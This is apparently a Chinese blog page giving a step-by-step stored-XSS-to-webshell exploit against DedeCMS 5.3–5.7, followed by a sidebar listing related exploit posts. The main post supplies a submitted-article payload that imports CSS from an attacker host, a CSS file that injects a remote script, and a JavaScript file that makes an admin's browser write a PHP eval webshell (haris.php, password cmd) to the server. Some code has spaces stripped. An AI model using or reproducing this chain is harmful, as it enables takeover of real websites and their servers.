dedecms xss 0day通杀所有版本 可getshell

最新推荐文章于 2021-03-26 19:18:48 发布
最新推荐文章于 2021-03-26 19:18:48 发布
阅读量1.7k 收藏 1
点赞数
文章标签: dedecms

漏洞虽老,但方法永远不会过时


漏洞原因:DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)

  目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个:

  1. 开启注册

  2. 开启投稿

注册会员-发表文章投稿,内容如下填写:

<style>@im\port'\http://xxx.com/xss.css';</style>

在你自己的网站xxx.com上新建xss.css内容如下:

body{background-image:url('javascript:document.write("<scriptsrc=http://xxx.com/xss.js></script>")') }

在你自己的网站xxx.com上新建xss.js 内容如下:

varrequest =false;if(window.XMLHttpRequest){request =newXMLHttpRequest();if(request.overrideMimeType){request.overrideMimeType('text/xml');}}elseif(window.ActiveXObject){varversions =['Microsoft.XMLHTTP','MSXML.XMLHTTP','Microsoft.XMLHTTP','Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0','Msxml2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP'];for(vari=0;i<versions.length;i++){try{request =newActiveXObject(versions);}catch(e){}}}xmlhttp=request;functiongetFolder(url ){obj =url.split('/')returnobj[obj.length-2]}oUrl =top.location.href;u =getFolder(oUrl);add_admin();functionadd_admin(){varurl="/"+u+"/sys_sql_query.php";varparams ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";xmlhttp.open("POST",url,true);xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");xmlhttp.setRequestHeader("Content-length",params.length);xmlhttp.setRequestHeader("Connection","Keep-Alive");xmlhttp.send(params);}

  当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd。

oceanark
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Dedecms V5.7.97 contain an XSS vulnerability
IerkeU的博客
07-19 3759
DedeCMS V5.7.97 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities.
dede批量Getshell
10-31
这个是百度批量的。自己保存为xx.php <...$exploit=Getshell($url); if (...% 5BGLOBALS%5D%5Bcfg_dbname%5D=de...
[T00ls]DEDECMS 0DAY
weixin_34125592的博客
01-24 106
无聊之中想出来的0DAY (反正最后能拿下WEBSHELL都叫0DAY把) 但前提要求条件比较苛刻 看完就明白 经典对白 看代码 member\index_do.php else if($fmdo=='login') // [url]http://127.0.0.1/member/index_do.php?fmdo=login&dopost=log...
Dedecms最新版本存储型XSS
weixin_33872566的博客
03-15 389
由于编辑文章的模板参数 typeid2可控,导致存储XSS发生。 dedecms/dede/templets/article_edit.htm页面316-325行代码如下: &lt;tr&gt; &lt;td height="24" colspan="2" class="bline"&gt;&lt;table width="800" border=
齐博 src="/do/js.php?id=775",齐博CMS存储型XSS可getshell(组合利用)
weixin_35841706的博客
03-26 418
齐博cms,利用威胁不大的前台存储型xss+没有任何危害的后台CSRF+几乎无影响可忽略的后台getshell 3个0day 结合起来的威力拿下齐博cms,虽然不算什么严重的漏洞,但是中途遇到的问题和突破还是聊以慰藉的,还请各位看官轻轻拍砖. ——by pandas前一段时间西毒爆出qibocms 0day的时候 就看过齐博cms的代码,发现了几个后台的getshell,后台getshell很多,...
dedecms利用xss+csrf getshell
weixin_30872867的博客
06-06 339
dedecms的漏洞很多,但是厂商都是不做修复。 之前乌云爆的一个二次注入的漏洞,其中title能够xss,但是官方只是修复了注入,xss并没有修复,只是在title上加了addslashes。 后台可触发xss 利用js代码 01 varrequest =false...
DedeCMS 存储型xss漏洞1
08-03
DedeCMS 存储型 XSS 漏洞1】详解 DedeCMS 是一款广泛使用的基于PHP的开源网站管理系统,其特色在于提供了一个简洁易用的后台管理界面,帮助企业或个人快速构建网站。然而,如同任何软件一样,DedeCMS 也存在安全...
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
[视频]K8飞刀 WordPress XSS添加管理员 & GetShell 教程-附件资源
03-02
[视频]K8飞刀 WordPress XSS添加管理员 & GetShell 教程-附件资源
xssshell2.0
08-02
xssshell 2.0 非常好用xss跨站工具. author:darkwahaha
DEDECMS5.7后台getshell1
08-03
DEDECMS5.7后台getshell1
mysql全版本通杀提权_DedeCMS版本通杀SQL注入漏洞利用代码
weixin_29794879的博客
01-19 220
packageorg.javaweb.dede.ui;importjava.awt.Toolkit;importjava.io.BufferedReader;importjava.io.InputStreamReader;importjava.net.URL;importjava.util.regex.Matcher;importjava.util.regex.Pattern;/****@aut...
二次注入 php,dedecms20140606 二次注入+存储型xss
weixin_32862641的博客
03-13 278
红色目录有exp,注入比较鸡肋目录dede/soft_edit.php, 存储型XSS漏洞 2include /memberlogin.class.php 会员笔名二次注入 4dede/soft_edit.php, 存储型XSS漏洞[php]/*** 软件编辑** @version $Id: soft_edit.php 1 16:09 2010年7月20日...
php批量getshell,getshell_phpcms2008 代码执行 批量getshell EXP(使用菜刀)_dedecms
weixin_29863401的博客
03-11 531
玩也玩够了,有点鸡肋,会提示此模板没安装等情况..有人发出来了 那老衲也发吧谷歌批量还需改进 一会儿会补上!原文:http://www.wooyun.org/bug.php?action=view&id=2984测试如下:http://www.90sec.org/yp/product.php?pagesize=${@phpinfo()}测试结果:http://www.cnqiyou.com...
php 5.6.15漏洞,中国骇客云0day漏洞之蝉知 5.6 getshell
weixin_42309722的博客
03-11 459
前台注入在/chanzhieps/system/module/cart/control.php页面的add函数更多关注www.hackerschina.orgPHP123456789101112131415public function add($product, $count){if($this->app->user->account == ‘guest’){/* Save i...
DEDEcms GET shell 再次通杀 所有版本
收集盒 Book box
03-31 1066
<br />还是上次的那个dede getshell 漏洞 ,只不过官方的补丁没有补到位。<br /><br />现在其基础上,修改图片代码实现最新版本补丁突破。<br />找一张图片,在保留图片代码的同时,插入如下代码<br /><br />复制代码<br
DEDECMS网站被黑,这个RemoveXSS漏洞要注意
云度
01-13 2637
   不知道你没有遇到过这样的情况,DEDECMS网站刚刚上线几天,网站风格大变,变成了红的,蓝的,非常吸引人眼球的内容,频繁还有美女跳出。 DEDECMS网站被黑   你被老板请到办公室喝了杯茶。你知道,自己的工作能力受到了质疑。 遇到问题马上百度,寒冬腊月仍然急得满头大汗,你在解决问题的时候,老板就站在你的椅子后面看着。 老板发话了,今天解决不完,明天就不用来上班了。 你解决问题...
dedecms 如何修补XSS跨站脚本攻击
书写人生
12-04 1056
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意 攻击用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常忽略其危害性。而本文主要讲的是利用XSS得到目标服务器的 shell。技术虽然是老技术,但是其思路希望对大家有帮助。
关于dedecms0day漏洞的解决方案(个人见解)
jsglzj的专栏
01-07 1360
dedecms0day漏洞的问题一直是dedecms用户头疼的问题,尽管官方也出一些漏洞补丁,个人总是觉得不太安全,经过一段时间的研究,总结一个通过设置网站的文件夹权限设置,经过一段时间的试验,效果还是很好。现在分享给大家。 web网站的注入一直各种web程序的一个软肋,特别对开源的而且有大规模应用的代码,一般注入的方式都是通过程序上传、sql注入方式上传webshell程序,从而把恶意代码以
dedecmsxss漏洞冒充管理员
最新发布
06-13
DEDECMS(Discuz!...XSS(跨站脚本攻击)是网络安全中的一种常见漏洞,当恶意用户在系统输入的数据中...3. 更新到最新的DEDECMS版本,因为官方会修复已知的安全漏洞。 4. 启用和定期检查安全模块,如XSS清理工具和防火墙。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值